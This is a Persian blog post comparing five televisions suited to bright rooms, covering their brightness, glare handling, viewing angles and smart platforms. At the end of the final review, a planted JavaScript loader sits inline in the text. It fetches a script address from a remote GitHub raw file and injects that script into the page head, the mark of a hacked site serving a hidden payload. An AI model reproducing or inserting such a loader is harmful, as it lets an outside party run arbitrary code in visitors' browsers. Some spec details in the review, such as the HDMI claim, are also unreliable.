دسته‌بندی نشده

معرفی 5 تلویزیون مناسب برای اتاق های روشن

بیشتر تلویزیون های 4K مدرن به اندازه کافی برای غلبه بر ایجاد سایه در اتاق های روشن, روشن هستند. اگر می خواهید از تلویزیون خود در یک اتاق روشن استفاده کنید باید به سراغ گزینه ای بروید که کنترل خوبی بر روی بازتاب نور داشته باشد و دارای سطح روشنایی مناسبی باشد. کنترل انعکاس بهتر کمک می کند تا شدت روشنایی روی نمایشگر در تابش های مستقیم و غیر مستقیم کاهش پیدا کند. روشنایی بالا با غلبه بر ایجاد بازتاب نور به چشم افراد روی نمایشگر به بهتر دیده شدن محتوا کمک می کند. در این مقاله سعی بر معرفی بهترین تلویزیون ها با روشنایی بالا و کنترل انعکاس نور داریم تا تصمیم گیری افراد را برای انتخاب تلویزیون مناسب برای محیط های روشن را ساده و اسان تر کنیم. 

بهترین تلویزیون LED برای اتاق های روشن: سامسونگ QN85A
اینچ های ارائه شده : 55,65,75,85

بهترین گزینه برای اتاق های روشن با پنل LED تلویزیون QLED سامسنوگ مدل QN85A می باشد. در این تلویزیون از پنل Mini LED استفاده شده است. این پنل با ایجاد روشنایی فوق العاده در صحنه های بسیار روشن موردی مناسب برای انتخاب می باشد. این تلویزیون کنترلی بالا بر روی انعکاس نور دارد و بسیار کاربردی برای اتاق های بسیار روشن با نور طبیعی زیاد می باشد. این تلویزیون برای استفاده در بیرون نیز گزینه ای مناسب است البته به صورت ضد اب طراحی نشده است بنابراین نیاز به محوطه مناسب برای جلوگیری از ریزش اب روی ان می باشد.
QN85A دارای زاویه دید گسترده است و می توان با گروهی از افراد در زوایا مختلف مسابقات ورزشی و فیلم و سریال های مختلف را تماشا کرد. پلتفرم تایزن روی این تلویزیون سامسنوگ اجرا شده است و همراه ان رنج گسترده ای از اپلیکیشن ها ارائه می شود بنابراین دسترسی به محتویات مورد علاقه برای کاربران بسیار اسان خواهد بود. در این تلویزیون محتویات کم کیفیت به خوبی ارتقا پیدا می کنند. متاسفانه این تلویزیون برای استفاده در اتاق های تاریک به دلیل کنتراست پایین و عدم یکنواختی مشکی که دارد مناسب نیست. در هر صورت QN85A تلویزیونی فوق العاده است و می تواند بسیاری از افراد را خشنود کند و موردی عالی برای اتاق ها روشن می باشد. 

جایگزین کوچک تر QN85A
تلویزیون سونی مدل KD-43X80J

اگر به دنبال یک تلویزیون در سایز کوچک تر برای اتاق های روشن هستید تلویزیون سونی مدل KD-43X80J انتخابی بسیار مناسب است. در حالی که تلویزیون QN85A سامسونگ در سایز های بزرگ موجود است این مدل از سونی در اندازه 43 اینچ می تواند کاربردی باشد. البته کنترل انعکاس و روشنایی این تلویزیون در حد انتظار عالی نیست و نمی توان از ان در اتاق های بسیار روشن استفاده کرد اما در هر صورت برای یک تلویزیون 43 اینچ می تواند مناسب و خوب باشد. زاویه دید در این تلویزیون گسترده است و دارای ارتقا دهنده عالی برای تصاویر می باشد. X80J به عنوان یک گوگل تی وی معرفی شده است و دارای محیطی بسیار کاربر پسند می باشد. اپلیکیشن های مختلفی از طریق پلی استور در این تلویزیون قابل دانلود و اجرا می باشند. به دلیل عدم استفاده از لوکال دیمینگ در این تلویزیون محتویات HDR چندان خوب ارائه نمی شوند. روشنایی و کنتراست این محتویات روی نمایشگر پایین می باشد. 

بهترین تلویزیون OLED برای اتاق های روشن : مدل C1 ال جی
اندازه : 48,55,65,77,83

تلویزیون C1 ال جی یک مدل عالی برای استفاده در اتاق های روشن با پنل OLED می باشد. این تلویزیون دارای روشنایی و کنترل انعکاس مناسب است اما در هر صورت پنل های اولد نمی توانند روشنایی LED را داشته باشند بنابراین اگر در اتاقی با روشنایی طبیعی زیاد می خواهید از تلویزیون استفاده کنید C1 گزینه کاملا مناسبی نمی باشد. این تلویزیون را می توانید در اتاق های نسبتا روشن به اسانی استفاده کنید و انتخابی عالی برای تماشا شو های تلویزیونی می باشد. ابن تلویزیون دارای زاویه دید گسترده ای است. پلتفرم اختصاصی ال جی WebOS همراه با رنج گسترده ای از اپلیکیشن ها و و کانال های مجاری روی این تلویزیون اجرا شده است و استفاده بسیار اسانی دارد. در تلویزیون C1 محتویات کم کیفیت بدون هیچگونه مشکلی ارتقا داده می شوند. 

بهترین تلویزیون اقتصادی برای اتاق های روشن : مدل U6G هایسنس
سایز : 50,55,65,75

تلویزیون U6G هایسنس یک انتخاب مناسب و کاربردی با قیمت مناسب جهت استفاده در اتاق های روشن می باشد. این تلویزیون برای محتویات SDR روشنایی بالایی را ارائه می دهد و همچنین دارای کنترل انعکاس بسیار مناسبی است. روشنایی این تلویزیون به اندازه ای نیست که بتوان ان را در محیط های بیرونی و در معرض تابش مستقیم نور قرار داد اما در باقی موارد کاربردی و مناسب است. این تلویزیون دارای پلتفرم هوشمند عالی است و دارای اپلیکیشن ها متنوع است و استفاده از ان بسیار اسان است.
U6G بسیار مناسب برای گیمینگ است و دارای پاسخگویی سریع و تاخیر ورودی پایین است ولی متاسفانه از دیگر قابلیت ها مانند HDMI 2.0 و نرخ رفرش متغییر پشتیبانی نمی کند. اگر می خواهید از این تلویزیون در اتاق های تاریک استفاده کنید کنتراستی عالی و لوکال دیمینگ فوق العاده ای دارد. روشنایی محتویات HDR روی ابن تلویزیون مناسب است و می تواند تجربه عالی را هنگام تماشا این محتویات ارائه دهد. متاسفانه زاویه دید این تلویزیون محدود می باشد. 

تلویزیون مناسب با زاویه دید گسترده : مدل UP8000 ال جی
سایز : 43,50,55,60,65,70,75,82,86

اگر می خواهید با گروهی از افراد در زاویه های مختلف تلویزیون را تماشا کنید مدل UP8000 از ال جی انتخابی عالی است. روشنایی ارائه شده در این تلویزیون به اندازه U6G هایسنس نیست و کنترل انعکاس چندان مناسبی ندارد اما در اتاق های نسبتا روشن می تواند کاربردی مناسب را ایجاد کند. پنل IPS استفاده شده در این تلویزیون زاویه دید گسترده را برای ان به ارمغان می اورد بنابراین می توان در هر گوشه از اتاق به اسانی محتویات روی نمایشگر را تماشا کرد. UP8000 همچنین در رنج گسترده ای از سایز ها نسبت به هایسنس ارائه می شود. و از سایز 43 اینچ برای اتاق های کوچک تا 86 اینچ برای اتاق های خیلی بزرگ برای ان ارائه می شود.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *